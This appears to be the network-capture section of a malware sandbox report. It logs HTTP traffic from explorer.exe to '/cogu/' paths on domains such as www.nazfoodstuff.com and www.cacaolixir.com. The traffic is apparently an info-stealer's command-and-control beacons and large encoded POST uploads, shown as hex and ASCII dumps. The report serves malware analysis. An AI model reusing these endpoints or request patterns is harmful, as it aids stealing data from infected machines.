c30q1NJQ3CBwrXsxSgvXT4pPIIDr93eUP3t85umAPSneg65kQA42bywSP9-ER9tm34-mQ6w72oFAsxF474Vv2rzAzgJbuyEUL(mDzIyk_rMkndgzLqjghy6roAll6yjQyOTlhVWSC46wTHej2voojhdluGwcFt9imFVACbhoXU8lpgVniKqVEIkpn9_KUmoZIBF4K6on79ecCyKM17rxjLkWTo0SunQ(jwVGNOKERMPy2oZsx~lC-qfP406gay7iDU6GmKol-SJuBITNsjRwIasd1HzGFdMFwyNdPWo(1HW3WDhTBNYjYOP5zvo(VFcMwvX8Hct5PLxp8(sKLi81W71YWCQ1x71xODpUOuUzTfPbBsJL1yXDaVzTenEqyD6B_pTEbhre6P0fwR3V-kdy0tU0engJwcHZdGC2AJRYVkNB_i3GZgWnnz_pdPK5QxL3smW5n(uJx2taifjZbgDjcPsWTck(tgKWUYn4rhcny2jpwSoarhhsXvU1c~FveoS89YjiFIY~4tEC2pO(BVomsLf(X3JKudA3EWtQWILNg0c3EVsAtNkeUDHXI1M1nw9otWwzLjCv_evC2mse6sUpE61uHsU9arwy_4S7O65hR8HU_Prd72hrz8yPyPsGBFDX9DKn-0YOK2fN4tjogTb3SuAmk1DQkqpPSk04O5WeG5LBgqa3vpXU4Q5AXe42JyX4tv6u13CraybRahqQJxeQfoAQvcAA4GIWwQXy1C9belIEJQiZXFLIoxNdA39RS1r6tHuINCPfhBsQ3hMQotXonVPXCLV84tLEuUDLRQKbL3L6Fct5amfPIqiLsAMTHAhpCcTvuEvqadWmr46tqm5lRuxPyhbzL6JhgWTh7zr66qUmzV6k5ykpQpxbImxNu85f69vHZnJxtZ9Y07czTWjaLm_c14I2HFKGGH4bHBCmQoiVXFbwwWv7XEXFMXdOAJEyKyE8fascziem7dlE8ODi4DvZeDybXKowHC1j6lqDzVDL-68A70n7kHWdzkgUYD9SyhblUEQYThpUA9KaqjHnqnV9DC_welErDmBo6Mz9SO2IZQDrALFcdm7~2AykF~oG_t8smccDwRkd_GTrYuYs3t6FtTL0kXaABu1Z6aCvqVCYzKYJiR5hnv3i0s-UjWjXFB_ugtniiSwn-UMpJHQQZGkMfDlgNWTvgSD5p9OZOfI4k8waKE8PmZcc2qkQAwbSyPd8kIZKDuTjlXcAY4HNyKe8Qjf8e63X8Nn(8r1Z1ixA17VnnofEhf1cnXBp7xIHKZFVRXSfKH4DLmjKmk6YK4eGCiIEJSMgTyepq~VewKM7mss9gT_C1oqdP1w0DoOzlJxaRsARsWKoOB1B9uf5VyKR9xCAvErM_8-XWyX8hrQOffQqAq6aN~Xt53cGlBm3dDuqMLRE7itCtnxajEETaZEkr3pccmRPebPwnqW5gGyMV7eC-en80sBcTqAqPj_mQ76rx8YVMxhJaCf4hzOXq1WtOPrVlzpjRP5Yc8l(A5JcSc5Py2g0N5Xak~ouWR8S0GlPNcGYaq1FDGz7j~ZglVZgtZyERui1sfuxsNdnjwn2G~7BT4vD_n-w1gJooE-AoZt5Zp7jo2ZQcYpeAZqhTetC7tm~ICaYjVRf_P4EXFDPdZ6fDIeTmn89MFgMnRgZMEkQ6n1z_flzAKVmP2xRPoPjb8Qw_GdzA1D71I2NkVHZLi97XyjqcyF3zRhay30D399p3cOk_BiAiwr1GPZXIWaIZSRXVU-tLbFLzFsTGgSnTtsh
Oct 13, 2021 15:53:10.739779949 CEST	8019	OUT	Data Raw: 71 61 28 4a 53 34 39 7a 4f 35 35 49 77 6e 32 67 4d 6a 64 77 71 52 75 70 49 78 4b 47 51 6a 39 31 59 67 71 58 78 47 6a 78 66 33 77 39 58 73 41 6b 6c 4c 30 56 41 2d 4d 31 72 77 30 31 59 78 63 61 6d 53 32 48 7e 34 72 78 62 6d 57 77 35 30 62 6d 4c 62 Data Ascii: qa(JS49zO55Iwn2gMjdwqRupIxKGQj91YgqXxGjxf3w9XsAklL0VA-M1rw01YxcamS2H~4rxbmWw50bmLbKKeLAw3vByk55xK8MzdZ0xMhrPgHAFOwPuuH8GoRH0BHnn8ELokkdBfz80DtLKoKddQo6XVaXyyBtt(FjFwByBa3OPWyOJtc1P5tPOmgmlTflbKJ(Mr_TxkQgB~u4x0NN6yPxTIRvNFrkoldP4Jy3tFI5J73B1kGe
Oct 13, 2021 15:53:10.903664112 CEST	8021	OUT	Data Raw: 50 31 57 32 4e 50 41 65 36 39 37 37 7e 75 6a 68 75 34 75 31 43 75 32 66 4b 49 52 78 47 77 7e 2d 36 6e 33 4c 78 4f 47 77 38 5f 6a 51 73 6d 6b 47 71 6e 4c 33 35 4f 4f 58 6c 50 68 6f 62 33 4f 2d 35 53 57 45 30 45 4b 48 35 70 53 67 54 6b 31 35 48 74 Data Ascii: P1W2NPAe6977~ujhu4u1Cu2fKIRxGw~-6n3LxOGw8_jQsmkGqnL35OOXlPhob3O-5SWE0EKH5pSgTk15Ht7DyjtGO3e_K_giX6Hnrt8sT393U-2daEFFKV8Mv6rY(F5NHXizd-gQUfDT6X8Pih9nZDYPHtVM7SLlaid6se~lm3gSFC8vM_5gkF5ScexOTTzLwJOU65KBV-YpJWEtHvMLGejIqX2_J9JKFdprpwVS0MJBIRDZRyO
Oct 13, 2021 15:53:10.903723955 CEST	8028	OUT	Data Raw: 75 4d 7a 54 68 64 70 44 33 77 38 65 36 77 4d 50 30 72 5a 79 65 53 68 57 68 4c 31 7a 6a 6f 76 34 30 67 73 38 42 74 4b 71 53 54 48 65 79 7a 73 6d 38 42 35 72 33 54 64 5a 38 76 59 46 64 61 72 62 47 39 43 78 4f 37 52 5a 63 71 69 64 34 69 4d 57 56 4c Data Ascii: uMzThdpD3w8e6wMP0rZyeShWhL1zjov40gs8BtKqSTHeyzsm8B5r3TdZ8vYFdarbG9CxO7RZcqid4iMWVLFL0V82S_MEVQy2D5JxvntLMubG0Tc0bp8lmijwSMPgBApU4iRXnPt-ys7DELXPkxKGstDXPpCn9KN0H5qu2Q4qwZZEAAZJKZ48Yer_hMWjdrwVM0rtp6qow3B0AHMySejApiCCvYzG36SF59EDgNPO5b1xztHYEaF
Oct 13, 2021 15:53:10.903774023 CEST	8036	OUT	Data Raw: 75 34 73 41 6b 49 63 38 35 39 32 30 78 76 5a 7a 57 78 6e 65 33 4f 7e 33 36 5f 7a 4c 31 47 48 69 67 37 54 4e 61 31 38 38 68 4e 4b 42 66 6a 4e 73 71 6a 72 6e 67 39 78 47 6a 66 76 38 35 70 33 37 36 43 67 4b 45 75 47 79 32 70 68 51 46 72 50 37 65 76 Data Ascii: u4sAkIc85920xvZzWxne3O~36_zL1GHig7TNa188hNKBfjNsqjrng9xGjfv85p376CgKEuGy2phQFrP7evk7hbDIGEMVdc54XrcQfJ5KqI~rzA8z~ELpCCLgGlH-4f8Lyem1SmVqVT4loDPuVORu(AZKF43vIcfFPTwSJ5yRQWVXzfvBvlXHezzPLWO8DZ9Dy9AoFkeCTewN3QrK9_gUqvposX69nmYVIx3NXteUWFWGBQ5Wq0R
Oct 13, 2021 15:53:10.903975010 CEST	8040	OUT	Data Raw: 44 74 64 51 39 5a 79 51 46 5a 75 52 6a 4a 7e 30 59 74 69 71 61 73 32 48 4e 42 72 4b 30 57 7a 55 72 74 4d 67 59 5a 59 5a 32 61 72 32 55 33 78 78 74 61 5a 78 58 70 4a 34 66 2d 54 52 45 34 65 34 57 71 5a 70 54 43 30 31 4e 30 6f 59 61 70 67 4b 78 37 Data Ascii: DtdQ9ZyQFZuRjJ~0Ytiqas2HNBrK0WzUrtMgYZYZ2ar2U3xxtaZxXpJ4f-TRE4e4WqZpTC01N0oYapgKx76ObXRPbxu8aRFBY8dieG115sxY4WI6OKmMvUQtgEOa(u(PKRohyTkD1KFcjsaYRjkHUGv2r56WjaIwjbxR3KOMlS3hMpaZGpI_f4sF(3SKATcDhsFuEIREEIzgRZyJmqcEIx3b3kcJicW7d-MLh07wsUf533SinXE
Oct 13, 2021 15:53:10.904119015 CEST	8042	OUT	Data Raw: 42 71 30 6b 44 4a 42 56 4d 65 32 78 56 7a 6b 49 30 31 36 6b 58 37 7e 4a 43 48 58 64 73 39 7a 35 56 65 42 57 33 37 44 66 6f 78 49 76 72 6c 5a 41 47 69 7a 35 28 63 59 33 53 7a 34 6c 53 70 64 65 62 79 44 63 4f 6e 39 4e 36 52 55 6a 59 6c 34 56 41 56 Data Ascii: Bq0kDJBVMe2xVzkI016kX7~JCHXds9z5VeBW37DfoxIvrlZAGiz5(cY3Sz4lSpdebyDcOn9N6RUjYl4VAVPUJzcpFyxm7VP7La91qjCRjBaMo227~gCMP-pT58(X9C1CJBPCMjdLE2RU3Q81~73aZPZH8e4bV_T-B1zOrtD-bXT1yOqHUusbDrLbR9iubMj7vUs-Yl4IS4FVcfBcmdxqSJFef96gFobApiyuv_vTp4S8~2ouwaO
Oct 13, 2021 15:53:10.904299021 CEST	8046	OUT	Data Raw: 45 49 57 46 32 33 6b 34 6e 6a 77 67 36 74 4e 7a 52 64 53 63 47 59 64 73 38 49 7a 54 42 66 79 55 48 37 6e 4d 7e 57 51 6b 6f 49 69 56 66 79 6c 63 41 59 73 76 4c 52 76 5f 46 77 68 35 74 65 41 52 66 45 5a 50 34 44 5a 35 34 54 59 76 28 71 28 5a 52 30 Data Ascii: EIWF23k4njwg6tNzRdScGYds8IzTBfyUH7nM~WQkoIiVfylcAYsvLRv_Fwh5teARfEZP4DZ54TYv(q(ZR0(XPlZkjs2eCpbvidGd1uQdPrgu1oS0LSTJOu9TNjxDpYay83nO245pYD8UjeAd3NZgoOSxuZHhKKG60PZW3ULl00COJuZejhK6F2VM5Wq9i4Sm37W3eopxYrAR9AQOkDoyMKy-yOA7MKcbyy7UotFyjIwUvfq9u8Q
Oct 13, 2021 15:53:11.067946911 CEST	8053	OUT	Data Raw: 54 50 74 47 78 5a 66 2d 71 32 76 57 67 49 42 78 72 59 7e 6f 77 44 6d 32 49 5f 4f 52 51 66 47 76 69 59 6d 58 78 55 43 65 4a 7a 56 42 79 35 76 46 59 4c 47 78 6b 61 7a 4b 43 5a 74 6f 61 41 7a 4b 74 54 33 4f 6b 6d 6e 79 28 58 76 6c 72 2d 58 76 76 4a Data Ascii: TPtGxZf-q2vWgIBxrY~owDm2I_ORQfGviYmXxUCeJzVBy5vFYLGxkazKCZtoaAzKtT3Okmny(Xvlr-XvvJP8jH86nbkPvDH2mUdNG04VhJHE4gxByuzjYpGBp5ijo3eMexvAEb1w0dmBa0eP8pkeFsJftoBijF(dAGaie8HwIH95DgpnZ7RxDAeE5ICDYjrzKl0AfX~jEsIalOQE9ONfnflNQjIdOp0gXo9i7IAUyYZQU5kAgeU
Oct 13, 2021 15:53:11.068073988 CEST	8067	OUT	Data Raw: 54 74 7e 31 51 72 78 4c 6c 37 4b 6a 68 45 62 52 62 6f 74 43 43 39 6b 70 31 4e 71 6d 59 77 65 4a 6f 64 42 5a 75 67 64 4b 4e 78 45 36 34 6c 74 45 48 53 77 6e 38 49 6d 66 7e 4f 64 75 52 72 7a 55 4b 4e 4a 48 67 4f 4d 4d 7a 36 77 4e 43 61 51 6e 34 65 Data Ascii: Tt~1QrxLl7KjhEbRbotCC9kp1NqmYweJodBZugdKNxE64ltEHSwn8Imf~OduRrzUKNJHgOMMz6wNCaQn4eYCbd0tVGAQRAiv6d8Sah4dF6yKJCOJCQvMdpdbp6dFvTJBKbOx(INwHzL5~8l7stNGERSxL_zU3DOeWl(pbmMamBjI5k8bF8IKUq3mXPV9P2tHxQiCacOqa2M3Xa6LSyeXWWoT4BcHju1HSZZhk0LQ5GWuVH7vJwZ
Oct 13, 2021 15:53:11.068129063 CEST	8070	OUT	Data Raw: 55 48 79 41 42 6d 43 2d 57 59 71 70 33 38 66 2d 63 55 49 6e 72 39 58 4f 54 32 71 7a 65 6c 66 38 48 34 49 67 43 48 36 41 68 5a 28 34 38 6b 36 4a 67 46 47 77 46 6e 7e 38 6c 45 38 35 43 4a 58 31 43 32 67 57 30 49 64 44 71 6f 52 4b 5a 32 6c 49 51 72 Data Ascii: UHyABmC-WYqp38f-cUInr9XOT2qzelf8H4IgCH6AhZ(48k6JgFGwFn~8lE85CJX1C2gW0IdDqoRKZ2lIQrO2v69IslJi1esxjYkFuqQs1vJUcskxgkUgmk9XxTNzASXPh83A(Gz1KZJAmorsLiYZtoHAVqX1xS02SmAQ(Dzcc1x8dkbDCX7Nohs4lRnyestIa8YMKS1i1YDdXR~ppZTmrqgi5cPn1ymzZh6JYk8J3LhMIPOiTvb
Oct 13, 2021 15:53:11.405528069 CEST	8144	IN	HTTP/1.1 400 Server: ZGS Date: Wed, 13 Oct 2021 13:53:11 GMT Content-Type: text/html;charset=ISO-8859-1 Content-Length: 80 Connection: close Set-Cookie: 0cea9df7db=cd858cf068bec389eea549b00143a3a9; Path=/ X-XSS-Protection: 1 Set-Cookie: csrfc=a84b1470-9c73-4bd8-8a26-9563f75a7c5a;path=/;priority=high Set-Cookie: _zcsr_tmp=a84b1470-9c73-4bd8-8a26-9563f75a7c5a;path=/;SameSite=Strict;priority=high Set-Cookie: JSESSIONID=7402ACD609570D1C7C1A2F54E5A3AD6F; Path=/; HttpOnly Data Raw: 7b 22 72 65 73 70 6f 6e 73 65 5f 63 6f 64 65 22 3a 22 34 30 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 22 31 22 2c 22 64 65 76 65 6c 6f 70 65 72 5f 6d 65 73 73 61 67 65 22 3a 22 49 6e 76 61 6c 69 64 20 69 6e 70 75 74 2e 22 7d 0a 0a Data Ascii: {"response_code":"400","status_code":"1","developer_message":"Invalid input."}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.11.20	49849	204.141.43.204	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:53:10.904226065 CEST	8042	OUT	GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1 Host: www.nazfoodstuff.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:53:11.075000048 CEST	8100	IN	HTTP/1.1 404 Server: ZGS Date: Wed, 13 Oct 2021 13:53:10 GMT Content-Type: text/html Content-Length: 4647 Connection: close Set-Cookie: 0cea9df7db=0f71d2b25c73f2883ce01c2fd3c97eb8; Path=/ X-XSS-Protection: 1 Set-Cookie: csrfc=15d53938-c996-4d36-8de4-bdf071a5a6bb;path=/;priority=high Set-Cookie: _zcsr_tmp=15d53938-c996-4d36-8de4-bdf071a5a6bb;path=/;SameSite=Strict;priority=high Pragma: no-cache Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT vary: accept-encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 5a 6f 68 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 77 65 62 66 6f 6e 74 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 70 78 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 70 78 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 74 6f 70 43 6f 6c 6f 72 73 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 6c 65 66 74 2c 20 23 66 30 34 37 33 64 20 30 25 2c 20 23 66 30 34 37 33 64 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 6c 65 66 74 2c 20 23 66 30 34 37 33 64 20 30 25 2c 20 23 66 30 34 37 33 64 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 34 35 Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:45
Oct 13, 2021 15:53:11.075078964 CEST	8102	IN	Data Raw: 32 70 78 20 61 75 74 6f 3b 68 65 69 67 68 74 3a 33 70 78 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 69 6e 43 6f 6e 74 61 69 6e 65 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 30 70 78 3b Data Ascii: 2px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; } .logo{ margin-top:3px; padding:18px 0px; } .content{ back
Oct 13, 2021 15:53:11.075134039 CEST	8103	IN	Data Raw: 2d 77 65 69 67 68 74 3a 34 30 30 3b 20 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 64 6f 6d 61 69 6e 2d 63 6f 6c 6f 72 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 23 30 30 38 36 44 35 3b 20 0a 20 20 20 20 Data Ascii: -weight:400; } .domain-color{ color:#0086D5; } .main-info{ margin-top: 40px; } .main-info li { font-size: 16px; padding: 10px 0;
Oct 13, 2021 15:53:11.075185061 CEST	8104	IN	Data Raw: 6f 72 73 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 43 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 69 6d 67 20 73 72 63 3d Data Ascii: ors"></div> <div class="mainContainer"> <div class="logo"><img src="https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb" alt="Zoho"></div> <div class="content"> <div class="textArea">

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.11.20	49850	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:53:16.101578951 CEST	8147	OUT	POST /cogu/ HTTP/1.1 Host: www.cacaolixir.com Connection: close Content-Length: 131140 Cache-Control: no-cache Origin: http://www.cacaolixir.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.cacaolixir.com/cogu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 45 36 3d 63 4e 4a 30 44 6d 41 53 6d 7a 66 76 6c 42 59 73 35 6d 4e 32 4a 45 34 6e 70 37 74 43 39 39 6d 32 55 52 62 61 73 51 51 36 50 50 7e 39 41 73 64 38 77 41 71 49 35 57 58 4b 57 5f 6d 32 54 37 51 45 46 42 33 5f 35 79 49 4d 51 30 37 4f 44 36 42 30 65 48 71 4d 44 52 47 35 78 31 73 32 76 74 68 79 6f 6f 39 35 64 73 76 50 77 41 66 76 6b 79 36 4a 4b 6e 58 4b 49 74 59 5f 38 6a 6e 70 31 2d 58 75 4b 7a 6d 5a 49 77 4b 59 69 59 69 36 77 73 4b 31 59 73 58 65 65 45 45 74 76 66 4c 52 56 39 64 4b 6c 74 66 4f 4d 4e 49 75 4c 54 46 62 62 37 4a 7a 76 75 44 33 4c 6a 6f 65 33 55 47 6e 41 56 31 32 55 55 61 7a 35 39 56 30 77 6a 35 6b 45 35 73 45 6a 4f 6b 43 4d 36 66 4b 5a 67 31 50 76 31 51 71 73 78 78 4b 4e 4e 4b 53 4a 68 28 56 36 63 36 61 54 6b 41 31 30 67 49 45 72 75 64 4d 53 47 49 70 42 30 49 4a 7e 4e 4d 4e 79 67 65 36 67 6a 7a 30 66 64 61 66 50 79 52 69 7e 43 41 39 6e 6a 6b 62 5a 6a 4b 30 70 49 41 52 36 44 62 67 4e 34 55 6b 4a 4a 54 42 6e 46 4b 62 4e 67 65 4f 4c 38 68 58 7e 4e 5a 6e 68 4a 6b 49 52 79 78 71 33 69 48 5f 6e 4f 76 75 70 47 72 42 5a 63 47 55 69 66 56 70 35 4a 59 51 74 5a 4c 4b 51 39 61 6f 37 55 6b 59 34 72 36 53 70 69 51 57 7e 79 63 32 6e 37 4c 76 74 74 30 4d 31 59 56 6c 4a 2d 73 57 76 37 36 48 4f 59 38 44 75 73 35 70 64 78 41 74 39 70 43 58 67 6d 54 4c 44 4e 44 6b 6a 6c 72 5a 45 39 6a 77 38 7a 6f 4e 4c 41 4e 37 37 32 35 5a 51 43 41 36 39 6b 55 56 4a 61 46 73 28 42 69 69 56 4e 37 5f 32 6a 36 72 30 63 4e 62 62 33 61 78 32 39 34 4f 42 58 45 5a 50 42 65 52 41 73 6a 33 6b 4e 41 78 73 39 36 59 52 46 7e 49 63 49 35 5f 6b 4d 7e 63 77 68 64 52 43 34 36 71 62 51 66 43 39 52 72 5f 6e 59 31 2d 6b 6e 74 55 57 31 4b 4a 61 5f 30 52 32 2d 42 73 7a 4d 4c 5a 49 52 68 63 50 47 31 43 56 74 4f 47 59 4b 6e 74 72 39 45 74 34 2d 78 39 31 5a 56 48 68 37 59 77 45 64 37 49 42 65 64 7a 70 75 4d 78 62 62 53 53 36 57 53 2d 49 35 62 5f 49 79 66 77 4f 37 54 4f 70 6a 76 39 4b 48 39 72 31 37 53 72 75 66 65 58 49 52 44 68 75 70 7e 32 52 51 4c 79 64 5f 33 42 31 70 45 76 4d 70 58 4f 78 70 4d 67 63 59 44 45 74 4f 37 31 31 47 54 61 4a 6a 54 70 6a 4c 52 6b 32 71 56 70 52 68 6f 47 52 6b 58 55 28 6b 77 2d 31 4e 4e 4a 47 67 64 2d 72 78 57 5f 6e 44 4c 4b 67 38 43 68 46 51 46 71 50 69 43 46 58 62 6b 6c 44 76 7e 33 6e 66 75 35 33 6f 59 7a 76 50 69 68 7a 7a 6f 38 34 6b 4f 37 6d 74 56 57 31 48 4f 42 68 35 4b 59 38 33 79 2d 4a 55 41 79 30 74 6e 6c 75 61 53 37 38 35 48 6a 55 56 42 2d 42 7a 6b 67 34 46 53 6b 30 57 71 39 64 61 4f 52 78 64 6f 67 28 30 57 54 6d 53 4c 7a 79 56 50 5f 63 6f 72 7a 44 2d 73 69 5a 47 39 53 28 56 68 54 48 6f 72 55 66 66 28 6f 65 32 65 35 6f 33 7a 78 56 79 67 31 74 65 6f 74 34 65 41 64 70 71 76 6f 49 44 66 6f 4f 6f 74 77 54 62 56 72 43 70 35 63 33 4d 41 30 41 6c 4b 49 45 51 48 65 39 4d 52 6d 79 77 54 78 78 63 62 63 7a 4c 7a 72 33 70 4f 59 7e 42 77 53 61 6a 71 44 51 4a 69 42 6d 72 57 68 4f 71 6a 67 55 79 28 55 30 73 76 4b 7a 54 48 36 35 51 35 6d 75 7a 50 6e 42 70 39 51 4b 32 54 41 71 68 71 68 47 59 50 4c 4c 61 53 54 39 53 77 59 51 43 50 57 35 49 41 41 52 4a 64 32 61 51 65 30 6c 79 4e 38 62 53 6b 73 62 56 33 4a 56 78 33 2d 59 5a 35 6f 7a 42 33 6b 31 6d 6e 53 31 46 48 65 64 52 7e 65 5a 32 6f 55 31 34 36 62 47 62 68 45 6c 5a 41 41 55 78 48 33 37 53 58 72 46 6a 51 7a 75 4c 6e 76 75 6e 58 67 53 2d 71 51 33 64 56 69 70 48 77 34 38 77 6d 77 78 51 77 6b 76 53 48 31 4d 4e 45 69 5a 49 37 69 4a 4c 6e 79 54 58 35 6e 76 6a 42 30 33 61 6a 47 4f 35 68 51 6e 69 64 66 49 2d 41 30 72 50 46 6d 73 36 69 65 31 72 28 34 6d 6f 32 4e 38 4f 4a 46 73 4f 35 7a 55 64 31 77 4c 76 46 6b 48 72 50 61 79 56 6f 69 6c 53 4c 5f 38 6a 64 6f 39 51 62 56 4c 35 4d 47 4e 52 56 45 71 4c 6a 54 7e 4d 50 34 78 37 4d 37 52 59 79 55 70 61 48 72 52 71 66 31 59 32 36 41 5a 71 4e 67 77 66 52 47 6b 33 47 72 6f 34 62 57 58 6f 62 5f 4b 33 72 6e 41 67 70 43 6f 5a 48 30 76 38 6a 78 33 45 73 35 34 31 61 44 32 67 33 30 33 38 42 74 49 59 4d 52 31 6f 56 50 4b 31 46 2d 6d 75 46 49 53 50 46 45 31 55 65 67 41 4f 6c 77 50 78 74 56 30 42 5a 6a 58 4a 48 76 7a 44 28 63 77 64 52 6b 76 51 41 51 7a 42 68 59 72 5a 73 6c 67 56 79 54 51 5f 53 55 65 35 31 56 68 76 51 4a 63 57 51 69 6a 78 5a 33 65 58 6e 53 28 71 33 72 Data Ascii: E6=cNJ0DmASmzfvlBYs5mN2JE4np7tC99m2URbasQQ6PP~9Asd8wAqI5WXKW_m2T7QEFB3_5yIMQ07OD6B0eHqMDRG5x1s2vthyoo95dsvPwAfvky6JKnXKItY_8jnp1-XuKzmZIwKYiYi6wsK1YsXeeEEtvfLRV9dKltfOMNIuLTFbb7JzvuD3Ljoe3UGnAV12UUaz59V0wj5kE5sEjOkCM6fKZg1Pv1QqsxxKNNKSJh(V6c6aTkA10gIErudMSGIpB0IJ~NMNyge6gjz0fdafPyRi~CA9njkbZjK0pIAR6DbgN4UkJJTBnFKbNgeOL8hX~NZnhJkIRyxq3iH_nOvupGrBZcGUifVp5JYQtZLKQ9ao7UkY4r6SpiQW~yc2n7Lvtt0M1YVlJ-sWv76HOY8Dus5pdxAt9pCXgmTLDNDkjlrZE9jw8zoNLAN7725ZQCA69kUVJaFs(BiiVN7_2j6r0cNbb3ax294OBXEZPBeRAsj3kNAxs96YRF~IcI5_kM~cwhdRC46qbQfC9Rr_nY1-kntUW1KJa_0R2-BszMLZIRhcPG1CVtOGYKntr9Et4-x91ZVHh7YwEd7IBedzpuMxbbSS6WS-I5b_IyfwO7TOpjv9KH9r17SrufeXIRDhup~2RQLyd_3B1pEvMpXOxpMgcYDEtO711GTaJjTpjLRk2qVpRhoGRkXU(kw-1NNJGgd-rxW_nDLKg8ChFQFqPiCFXbklDv~3nfu53oYzvPihzzo84kO7mtVW1HOBh5KY83y-JUAy0tnluaS785HjUVB-Bzkg4FSk0Wq9daORxdog(0WTmSLzyVP_corzD-siZG9S(VhTHorUff(oe2e5o3zxVyg1teot4eAdpqvoIDfoOotwTbVrCp5c3MA0AlKIEQHe9MRmywTxxcbczLzr3pOY~BwSajqDQJiBmrWhOqjgUy(U0svKzTH65Q5muzPnBp9QK2TAqhqhGYPLLaST9SwYQCPW5IAARJd2aQe0lyN8bSksbV3JVx3-YZ5ozB3k1mnS1FHedR~eZ2oU146bGbhElZAAUxH37SXrFjQzuLnvunXgS-qQ3dVipHw48wmwxQwkvSH1MNEiZI7iJLnyTX5nvjB03ajGO5hQnidfI-A0rPFms6ie1r(4mo2N8OJFsO5zUd1wLvFkHrPayVoilSL_8jdo9QbVL5MGNR